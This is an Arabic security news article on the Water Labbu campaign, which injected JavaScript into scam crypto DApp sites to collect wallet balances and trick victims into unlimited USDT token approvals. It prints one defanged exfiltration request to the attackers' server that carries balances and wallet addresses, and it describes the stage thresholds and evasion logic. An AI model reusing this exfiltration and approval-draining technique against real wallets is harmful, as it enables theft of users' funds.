يستفيد برنامج Water Labbu من مخططات الهندسة الاجتماعية للمحتالين الآخرين عن طريق تقديم برامج ضارةكود JavaScript في التطبيقات اللامركزية لسرقة العملة المشفرة.
وجد الباحثون في MicroTrendالبرمجيات الخبيثة Water Labbu التي هاجمت الخدمات التي تهدف إلى الاحتيال بالعملات المشفرة. كقاعدة عامة ، يستخدم محتالو التشفير أساليب الهندسة الاجتماعية لكسب ثقة الضحية. في المقابل ، يسرق Water Labbu العملات المشفرة باستخدام طريقة مماثلة ، دون استخدام الهندسة الاجتماعية - على الأقل ليس بشكل مباشر. بدلاً من ذلك ، يسمح Water Labbu للمحتالين الآخرين باستخدام حيل الهندسة الاجتماعية لخداع الضحايا المطمئنين.
عندما يجد المهاجم ضحية لديهالمحفظة المتصلة بأحد المواقع الاحتيالية تحتوي على كمية كبيرة من العملات المشفرة ، ترسل حمولة JavaScript المحقونة طلبًا للحصول على أذونات. يتم إخفاء الطلب كما لو أنه تم إرساله من موقع تم اختراقه ويطلب الإذن (إذن باستخدام الرموز) لتحويل مبلغ غير محدود تقريبًا من USD Tether (USDT ، وهو عملة مستقرة مربوطة بالدولار الأمريكي بقيمة 1: 1) من أهداف المحفظة.
تم إخبار أهداف Water Labbu أن الطلب كانتم إصداره في الأصل من DApp ، ومع ذلك ، فإن الإذن الممنوح لا ينتمي إلى عناوين التشفير الأصلية للمخادع ، ولكن إلى عنوان آخر تتحكم فيه Water Labbu.
يوجد حاليًا 45 عملية احتيال معروفةمواقع DApp المرتبطة بالعملات المشفرة التي تم اختراقها بواسطة Water Labbu. هذه المواقع لها أنماط وموضوعات مشابهة للمواقع المستخدمة في عمليات احتيال السيولة بدون خسارة.
بعد التحقق من سجلات المعاملات لعناوين المهاجمين على Ethereum blockchain ، تبين أنهم نجحوا في سرقة أموال من تسعة ضحايا مختلفين على الأقل ، بإجمالي ما لا يقل عن 316،728 دولارًا.
تحليل عملية سرقة العملات المشفرة
تتضمن طريقة Water Labbu اختراق مواقع DApp المارقة وحقن حمولات JavaScript فيها.
لاحظ الخبراء السلوك التالي:
من الجدير بالذكر أن خادم التسليم ينفذآلية لتجنب التنزيلات المتعددة لبرنامج نصي من نفس عنوان IP خلال فترة زمنية قصيرة. إذا كان عنوان IP قد وصل إلى خادم التسليم في الساعات القليلة الماضية ، أو إذا كان نوع الجهاز الذي تستخدمه الضحية لا يفي بالمتطلبات الأساسية الأخرى ، فسيعيد نصًا بسيطًا يجمع بيانات ملف تعريف الارتباط و LocalStorage ويرسلها مرة أخرى إلى خادم التسليم.
البرنامج النصي لسرقة العملة المشفرة: المرحلة الأولى
يتم تحميل مكتبة web3.js مبدئيًا.يمنح هذا البرنامج النصي القدرة على الاتصال بمحفظة الضحية ، على الرغم من أن البرنامج النصي الضار سيتصل فقط بمحفظة الضحية إذا كانت محفظة الضحية متصلة بموقع DApp المخترق. يتيح الوصول إلى المحفظة لـ Water Labbu تحديد عنوان Ethereum الهدف والتوازن. يتفاعل البرنامج النصي أيضًا مع عقد Tether USD الذكي للحصول على رصيد USDT للضحية. إذا كانت المحفظة تحتوي على أكثر من 0.001 ETH أو أكثر من 1 USDT ، فسوف ترسل معلومات رصيد المحفظة وعنوان المحفظة إلى خادم المجموعة ، linkstometa [.] com ، عبر طلب HTTP.
يعرض النص أدناه طلبًا لسحب رصيد المحفظة:
hxxps[:]//linkstometa[.]com/data/?get&s=[%22{ETH Balance}%22,%22{USDT Balance}%22]&j={عنوان الايثيريوم}
نص سرقة العملات المشفرة: المرحلة الثانية
طلب الاستخراج سينشر النصالمرحلة الثانية ، بمجرد أن يكون للرصيد المحدد رصيد ETH أعلى من 0.005 ETH ورصيد رمز USDT أعلى من 22000 USDT. وإلا فإنه سيعيد حمولة فارغة ويترك الضحايا للمحتالين الآخرين. خلال سيناريو المرحلة الثانية ، يتم إجراء فحص رصيد آخر وطلب إذن لاستخدام الرموز المميزة.
طلب الموافقة على رمز للضحايامنح الإذن للعنوان المحدد لإتمام المعاملات وإنفاق أصول العملة المشفرة. يطلب البرنامج النصي الضار حدًا للموافقة يبلغ 10 ^ 32 USDT ، وهو ما يزيد كثيرًا عن المبلغ الإجمالي لرموز USDT المتاحة على blockchain. عند إصدار طلب "الموافقة" ، ستطلب تطبيقات محفظة العملات المشفرة من المستخدمين مراجعة تفاصيل الطلب قبل التأكيد. إذا لم تتحقق الضحية بعناية من بيانات الطلب ومنحت الإذن بعنوان Water Labbu ، فسيكون المهاجم قادرًا على تحويل كل USDT من محفظة الضحية.
تمكنت Water Labbu من سرقة الأموال منما قيمته 316،728 دولارًا أمريكيًا من العملات المشفرة عن طريق حقن نصوصهم الخبيثة في مواقع الويب الاحتيالية لمحتالين آخرين ، مما يدل على استعدادهم لاستخدام أساليب المهاجمين الآخرين لأغراضهم الخاصة.
لذلك ، يجب على المستخدمين الحذرأي دعوات استثمارية تأتي من جهات غير موثوقة. بالإضافة إلى ذلك ، لا ينبغي لهم تداول العملات المشفرة على أي منصة غير معروفة دون التحقق بعناية من شرعيتها ، وفهم ما يفعله وكيف يعمل.
قراءة هذا:
متصفح تور المزيف يسرق عملة البيتكوين من مستخدمي darknet
لجنة التجارة الفيدرالية: خسر ضحايا الاحتيال أكثر من مليار دولار من العملات المشفرة
سرق مستخدم Electrum $ 32000 بسبب ضعف المحفظة
ESET: نسخة وهمية من متصفح تور يسرق BTC
الإجراءات الأمنية عند تحويل العملة المشفرة إلى عنوان آخر
النسخة المزيفة من متصفح Tor تسرق عملات المستخدم